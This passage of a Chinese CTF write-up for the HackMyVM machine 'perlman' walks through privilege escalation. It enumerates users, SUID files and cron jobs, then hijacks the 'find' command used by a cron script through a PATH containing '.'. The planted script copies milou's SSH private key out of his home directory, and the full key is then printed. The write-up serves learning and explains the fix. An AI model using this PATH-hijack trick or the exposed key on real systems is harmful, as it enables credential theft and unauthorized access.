\/><\/div><\/p>\n<p>\u63a5\u4e0b\u6765\u540c\u7406\uff0c\u6700\u540e\u53ef\u4ee5\u4e0a\u4f20shell\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746969.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746969.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711163121920\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746970.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746970.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711163139940\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u597d\u50cf\u5931\u8d25\u4e86\uff0c\u627e\u4e00\u4e0b\uff0c\u6709\u6ca1\u6709\u75d5\u8ff9\uff0c\u5728\u5a92\u4f53\u90e8\u5206\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746971.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746971.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711164054516\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746972.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746972.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711163947580\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\u5c1d\u8bd5\u89e6\u53d1\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746973.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746973.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711164024419\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u767b\u5f55rita<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@perlman.hmv:\/$ cd ~\n(remote) 
www-data@perlman.hmv:\/var\/www$ cd html\n(remote) www-data@perlman.hmv:\/var\/www\/html$ ls -la\ntotal 148\ndrwxr-xr-x 8 www-data www-data  4096 Sep 10  2022 .\ndrwxr-xr-x 4 www-data www-data  4096 Jul 24  2022 ..\ndrwxr-xr-x 8 www-data www-data  4096 Sep 10  2022 .git\n-rw-r--r-- 1 www-data www-data 20454 Jul 23  2022 article-details.html\ndrwxr-xr-x 2 www-data www-data  4096 Jul 23  2022 css\ndrwxr-xr-x 2 www-data www-data  4096 Jul 23  2022 images\n-rw-r--r-- 1 www-data www-data 47426 Jul 23  2022 index.html\ndrwxr-xr-x 2 www-data www-data  4096 Jul 23  2022 js\n-rw-r--r-- 1 www-data www-data 25624 Jul 23  2022 privacy-policy.html\ndrwxr-xr-x 2 www-data www-data  4096 Jul 23  2022 removed_backup_2011\n-rw-r--r-- 1 www-data www-data 18494 Jul 23  2022 terms-conditions.html\ndrwxr-xr-x 2 www-data www-data  4096 Jul 23  2022 webfonts\n(remote) www-data@perlman.hmv:\/var\/www\/html$ sudo -l \n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:106:112::\/var\/spool\/exim4:\/usr\/sbin\/nologin\npostfix:x:109:116::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndovecot:x:107:114:Dovecot mail server,,,:\/usr\/lib\/dovecot:\/usr\/sbin\/nologin\ndovenull:x:108:115:Dovecot login user,,,:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:110:118:MySQL 
Server,,,:\/nonexistent:\/bin\/false\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat \/etc\/passwd | grep &#039;\/bin\/bash&#039;               \nroot:x:0:0:root:\/root:\/bin\/bash\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ su rita -l\nPassword: \nrita@perlman:~$ <\/code><\/pre>\n<h3>\u52ab\u6301\u547d\u4ee4\u83b7\u53d6\u79c1\u94a5<\/h3>\n<pre><code class=\"language-bash\">rita@perlman:~$ sudo -l\n[sudo] password for rita: \nSorry, user rita may not run sudo on perlman.\nrita@perlman:~$ ls -la\ntotal 28\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 root root 4096 Jul 23  2022 ..\nlrwxrwxrwx 1 rita rita    9 Jul 23  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 rita rita 3526 Jul 26  2022 .bashrc\ndrwxr-xr-x 3 rita rita 4096 Jul 26  2022 .local\ndrwx------ 3 rita rita 4096 Jul 11 08:43 mail\n-rw-r--r-- 1 rita rita  808 Sep 11  2022 .profile\ndrwx------ 2 rita rita 4096 Sep 11  2022 .ssh\nrita@perlman:~$ cd mail\nrita@perlman:~\/mail$ ls -la\ntotal 12\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 ..\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .imap\nrita@perlman:~\/mail$ cd .imap\/\nrita@perlman:~\/mail\/.imap$ ls -la\ntotal 20\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita  452 Jul 11 08:43 dovecot.list.index.log\n-rw------- 1 rita rita    8 Jul 11 08:43 dovecot-uidvalidity\n-r--r--r-- 1 rita rita    0 Jul 11 08:43 dovecot-uidvalidity.668f7f1f\ndrwx------ 2 rita rita 4096 Jul 11 09:00 INBOX\nrita@perlman:~\/mail\/.imap$ cd INBOX\/\nrita@perlman:~\/mail\/.imap\/INBOX$ ls -la\ntotal 16\ndrwx------ 2 rita rita 4096 Jul 11 09:00 
.\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita  388 Jul 11 09:00 dovecot.index.cache\n-rw------- 1 rita rita  660 Jul 11 09:02 dovecot.index.log\nrita@perlman:~\/mail\/.imap\/INBOX$ cat dovecot.index.log \nhdr-pop3-uidl\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd &gt;\ufffd\ufffd\ud04ff\ufffd(\ufffd\ufffdf\ufffd\ufffd.\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd\nheader-md5\ufffd\ufffd\ufffd\ufffduY^\ufffd\u05c6\ufffdZ\ufffd\ufffdQ!#&gt;!\ufffd\ufffd\ufffd\ufffd 0T$`\ufffdf\ufffd\ufffd\ufffd\ufffd \ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffdcache\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdf\ufffd\ufffd\ufffd8\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffdf\ufffd\ufffd\ufffd\ufffdp\ufffd\ufffd\ufffd<\/code><\/pre>\n<p>\u6ca1\u53d1\u73b0\u5565\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">rita@perlman:~\/mail\/.imap\/INBOX$ cd ~\nrita@perlman:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/rnews\n\/usr\/libexec\/polkit-agent-helper-1\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/innbind: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=e6511c2a7e6fecb7203c28170ce4d10b91ba7565, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/rnews\n\/usr\/lib\/news\/bin\/rnews: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, 
BuildID[sha1]=a70350be5f5be2d0864083120b169305c76ae0da, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/rnews\n-rwsr-xr-- 1 news uucp 26896 Feb 16  2021 \/usr\/lib\/news\/bin\/rnews\nrita@perlman:~$ echo $SHELL\n\/bin\/bash\nrita@perlman:~$ cat \/etc\/group | grep uucp\nuucp:x:10:\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/innbind\n-rwsr-xr-- 1 root news 14480 Feb 16  2021 \/usr\/lib\/news\/bin\/innbind\nrita@perlman:~$ cat \/etc\/group | grep news\nnews:x:9:\nrita@perlman:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<p>两个 SUID 文件都用不上：rnews 属主 news、属组 uucp，innbind 属主 root、属组 news，权限都是 <code>-rwsr-xr--<\/code>，other 没有执行位；而 uucp 和 news 组都没有成员，rita 也不在其中，所以根本执行不了。getcap 只看到 ping 的 cap_net_raw，也没有可利用的 capability。继续！上传 pspy64 看看有没有定时任务：<\/p>\n<pre><code class=\"language-bash\">(remote) rita@perlman.hmv:\/tmp$ chmod +x pspy64 \n(remote) rita@perlman.hmv:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n<p>pspy64 直接段错误，先手动检查系统 crontab（后文作者改为 ssh 登录后用 wget 下载，pspy64 就能正常运行，怀疑是 pwncat-cs 传文件时把二进制弄坏了）：<\/p>\n<pre><code class=\"language-bash\">(remote) rita@perlman.hmv:\/tmp$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) rita@perlman.hmv:\/tmp$ cd \/home\n(remote) rita@perlman.hmv:\/home$ ls -la\ntotal 20\ndrwxr-xr-x  5 root       root       4096 Jul 23  2022 .\ndrwxr-xr-x 18 root       root       4096 Sep 10  2022 ..\ndrwxr-xr-x  4 milou      milou      4096 Sep 11  2022 milou\ndrwxr-xr-x  5 rita       rita       4096 Jul 11 08:43 rita\ndrwxr-xr-x  4 ze_perlman ze_perlman 4096 Sep 11  2022 ze_perlman\n(remote) rita@perlman.hmv:\/home$ cd milou\/\n(remote) rita@perlman.hmv:\/home\/milou$ ls -la\ntotal 32\ndrwxr-xr-x 4 milou milou 4096 Sep 11  2022 .\ndrwxr-xr-x 5 root  root  4096 Jul 23  2022 ..\nlrwxrwxrwx 1 root  root     9 Jul 26  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 milou milou  220 Jul 26  2022 .bash_logout\n-rw-r--r-- 1 milou milou 3528 Jul 26  2022 .bashrc\n-rwxr-xr-x 1 milou milou  152 Sep 11  2022 clean.sh\ndrwxr-xr-x 3 milou milou 4096 Jul 26  2022 .local\n-rw-r--r-- 1 milou milou  883 Jul 27  2022 .profile\ndrwx------ 2 milou milou 4096 Sep 11  2022 
.ssh\n(remote) rita@perlman.hmv:\/home\/milou$ cat clean.sh \n#! \/bin\/bash\n\next=(save bak bif old bck bkz sqb bak2)\n\nfor x in ${ext[@]}\ndo\ncd \/tmp &amp;&amp; find . -type f -user $(whoami) -name &quot;*.$x&quot; -exec rm {} +\ndone<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a\u5947\u602a\u7684\u811a\u672c\u770b\u4e0a\u53bb\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u60f3\u529e\u6cd5\u8fd8\u662f\u5f97\u7528pspy64\uff0c\u4f7f\u7528ssh\u79c1\u94a5\u767b\u5f55\u518d\u4f7f\u7528wget\u4e0a\u4f20\u5c31\u80fd\u4f7f\u7528\u4e86\u3002\u3002\u3002\u3002\u3002pwncat-cs\u7684\u96f7\u70b9\uff1f\uff1f\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746974.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746974.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711165745220\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6267\u884c\u4e86 root \u7684\u4e00\u4e2a\u5b9a\u65f6\u811a\u672c\u4ee5\u53ca \u521a\u521a\u627e\u5230\u7684\u90a3\u4e2a\u5b9a\u65f6\u811a\u672c\uff0c\u800c\u4e14\u52a0\u8f7d\u4e86\u4e2a\u4eba\u8bbe\u7f6e\uff1a<\/p>\n<pre><code class=\"language-bash\">rita@perlman:\/tmp$ cat \/home\/milou\/.profile \n# ~\/.profile: executed by the command interpreter for login shells.\n# This file is not read by bash(1), if ~\/.bash_profile or ~\/.bash_login\n# exists.\n# see \/usr\/share\/doc\/bash\/examples\/startup-files for examples.\n# the files are located in the bash-doc package.\n\n# the default 
umask is set in \/etc\/profile; for setting the umask\n# for ssh logins, install and configure the libpam-umask package.\n#umask 022\n\n# if running bash\nif [ -n &quot;$BASH_VERSION&quot; ]; then\n    # include .bashrc if it exists\n    if [ -f &quot;$HOME\/.bashrc&quot; ]; then\n        . &quot;$HOME\/.bashrc&quot;\n    fi\nfi\n\n# set PATH so it includes user&#039;s private bin if it exists\nif [ -d &quot;$HOME\/bin&quot; ] ; then\n    PATH=&quot;$HOME\/bin:$PATH&quot;\nfi\n\n# set PATH so it includes user&#039;s private bin if it exists\nif [ -d &quot;$HOME\/.local\/bin&quot; ] ; then\n    PATH=&quot;$HOME\/.local\/bin:$PATH&quot;\nfi\n\nexport PATH=.:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\n<p>milou 的 <code>.profile<\/code> 最后一行 <code>export PATH=.:\/usr\/local\/bin:...<\/code> 把当前目录 <code>.<\/code> 放在了 PATH 最前面，之后任何不带路径调用的命令都会先在当前目录里查找；而 clean.sh 恰好先 <code>cd \/tmp<\/code> 再裸调用 <code>find<\/code>：<\/p>\n<pre><code class=\"language-bash\">cd \/tmp &amp;&amp; find . -type f -user $(whoami) -name &quot;*.$x&quot; -exec rm {} +<\/code><\/pre>\n<p>所以只要在 \/tmp 里放一个名为 <code>find<\/code> 的可执行文件，定时任务以 milou 身份跑 clean.sh 时就会先找到并执行 \/tmp\/find，从而劫持 <code>find<\/code> 命令。这里让它把 milou 的私钥复制出来并放开权限，等 cron 跑过一轮后再读取（修复方式：脚本里用绝对路径 <code>\/usr\/bin\/find<\/code>，并且永远不要把 <code>.<\/code> 放进 PATH）：<\/p>\n<pre><code class=\"language-bash\">rita@perlman:\/tmp$ cat find\ncp \/home\/milou\/.ssh\/id_rsa \/tmp\/flag &amp;&amp; chmod 666 \/tmp\/flag\nrita@perlman:\/tmp$ chmod +x find\nrita@perlman:\/tmp$ cat flag\n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAqbS3htQvnVwWEyQl8L1mDdnZzxHiTrP+iqmx\/LUR\/SZ+\/8bMk7c2\nKGTBZZFt3fZnF6VejwhIdm06mWtFWAIuUrr2MyUNl+QbWhG3kL\/NGPQcKoqyEgOIOkKb1V\nMr4m5k5C5Cprh3c96YVWZTVqs\/tqDBVFJ+nMlV+zJ7vbSmfJ84a2h\/h9\/ZQ+EeP97jjXhN\nGZa5Q14wons2oEsHrepmyDYlRs3a9nZe0NNq5\/FPehvNYGRvAxUwDMRTDcAATqDVL3TPln\naD02kAoJ9VQ34elDOu9X777h\/o26VudlpfHd+dYqIhfwPv5WB5bt0PXCIoYiCiA4pTWGb1\n6EOq4qR9SUJsWfmDEEG+nVjUn+ZtfHxduUG4bj2b6+ucfr\/plCvIUpnosc7x97UGh5vXxF\nRfJeBjcqEZENjSKtpuQn6OTCJ1qRcFW0bCKiUr1rUq0WFNPke9X0qXBIkfiyU2mhtIGpty\nBQHLBoSSMXEfHogB+UV9BJ4gm58ohejY3r2kB3MJAAAFiOkpltbpKZbWAAAAB3NzaC1yc2\nEAAAGBAKm0t4bUL51cFhMkJfC9Zg3Z2c8R4k6z\/oqpsfy1Ef0mfv\/GzJO3NihkwWWRbd32\nZxelXo8ISHZtOplrRVgCLlK69jMlDZfkG1oRt5C\/zRj0HCqKshIDiDpCm9VTK+JuZOQuQq\na4d3PemFVmU1arP7agwVRSfpzJVfsye720pnyfOGtof4ff2UPhHj\/e4414TRmWuUNeMKJ7\nNqBLB63qZsg2JUbN2vZ2XtDTaufxT3obzWBkbwMVMAzEUw3AAE6g1S90z5Z2g9NpAKCfVU\nN+HpQzrvV+++4f6NulbnZaXx3fnWKiIX8D7+VgeW7dD1wiKGIgogOKU1hm9ehDquKkfUlC\nbFn5gxBBvp1Y1J\/mbXx8XblBuG49m+vrnH6\/6ZQryFKZ6LHO8fe1Boeb18RUXyXgY3KhGR\nDY0irabkJ+jkwidakXBVtGwiolK9a1KtFhTT5HvV9KlwSJH4slNpobSBqbcgUBywaEkjFx\nHx6IAflFfQSeIJufKIXo2N69pAdzCQAAAAMBAAEAAAGAFg\/wbA7ZwdNe604fwJRe2B4iOt\nFQYnrz9ILrKLdBh2+hww7NOcbvu4Cdw96MMfb+oAxXprCk+wBoRdm0QiTGcOrtZujCQ6Tc\nCXGUM7U7rKrPnpg5Xi4nX6uZJrqRUfaYFzIMaDBDF0Uw+Kk83F+XAN8VQykWXLuv+eAuRh\nNeMYVhiFUlfzySukhh7lvDqXiiTVlS7HcqS3VJPL2EWg\/HHPAtGG9ar\/\/jg7J4i37LnkxO\n\/uEPrY7rmD1NrtPvNkmiNzN5cq9w30Ve9wt4nQMHpNZ+KZYojJcEVxI9qWF8wB3Rxx4pGJ\nQmvhBcZLNa+vwmhqweJ7MO2cMwdJI5BWf21TAGf\/8NQ0hoGDE0Yy2lwCVTh5Ow2xBIyV4x\nOBVl3IR0\/HSeP8p48Mh1BjhxTfpGl58C1DaH0lgk8AzmhY5Vt2WZXzd+XXm5za1KWHJcWL\nsoBlKTWPmHvaFyhnyJulrh53\/\/R\/bdgAGHjhHm63+QMlDbr7rELSmUxfyuuzx5QjqBAAAA\nwDZTWnAXApcfOvHYZ8hP6zGQybXKbVRW7SgSPjI0rJSvVsoIm\/L0NNnicDZEg5EOfuGDTk\nv1Pu8iNYF8uyXhU1ZMn81oAfK\/qWWY\/AMEmUJQt3Dp0jLQf\/n3rypRTPOotzhCQMV0ipxX\n3a\/BwR9QeNf1181S\/klWroa96epRtALzzKs0NTAg0cbmAHBDAkef4tbNBM2PRlYN+32Iyt\nVDppjsH9dX1+cW
VxwenjtwQXkr4Vzo1sHADVB1rn9khroe6wAAAMEA2Th9DGLdXIUUx+J6\nw6yR6OxMgxUF4HJdP0GogQYqx93VqsXQY9GC0vMIrQNxQF+00uHyMztyOAaT9r3BoQgMq7\nvqM6W2kS5NSq1O7MbBV7ZBMA8ngWWOVvur0MaCv8vJmGA14RpD8Wo8NZuE6KAaP8d03ct+\n6EFv7Lk7shaa0QfsC2RF1h4bp\/gLG1aqhUEsepIiQH7D1WKeXmuF0Usd8wohYFKlTTrFm+\npjXbBXj25mX1hBJ1F1y6kfx+8JFN9VAAAAwQDIALCU3fCJ7sqKyGbdNxamC+vwezQ6ZptK\n8e70JxHqAEfuL\/YKsZrqyt9rFP\/9vR4kMsNo6QDzmve0YyEI2lRWKw4MMzCpsUSYVwNI0Q\nqtdIOCfYzgT2duv4wDlujQsx6rg6clDlFh1VACRc51b9169j6HkqgS9WRmdSGp+vZu\/Dol\nuY0h4YVayCtgXaLRjIPBOj46iH+PBkohdLJCi4eWze0hA5hqtvFfo221lyJN7MhD96IpIi\nHLRZcy1a50\/OUAAAARbWlsb3VAcGVybG1hbi5obXYBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746975.png'><img class=\"lazyload lazyload-style-2\" 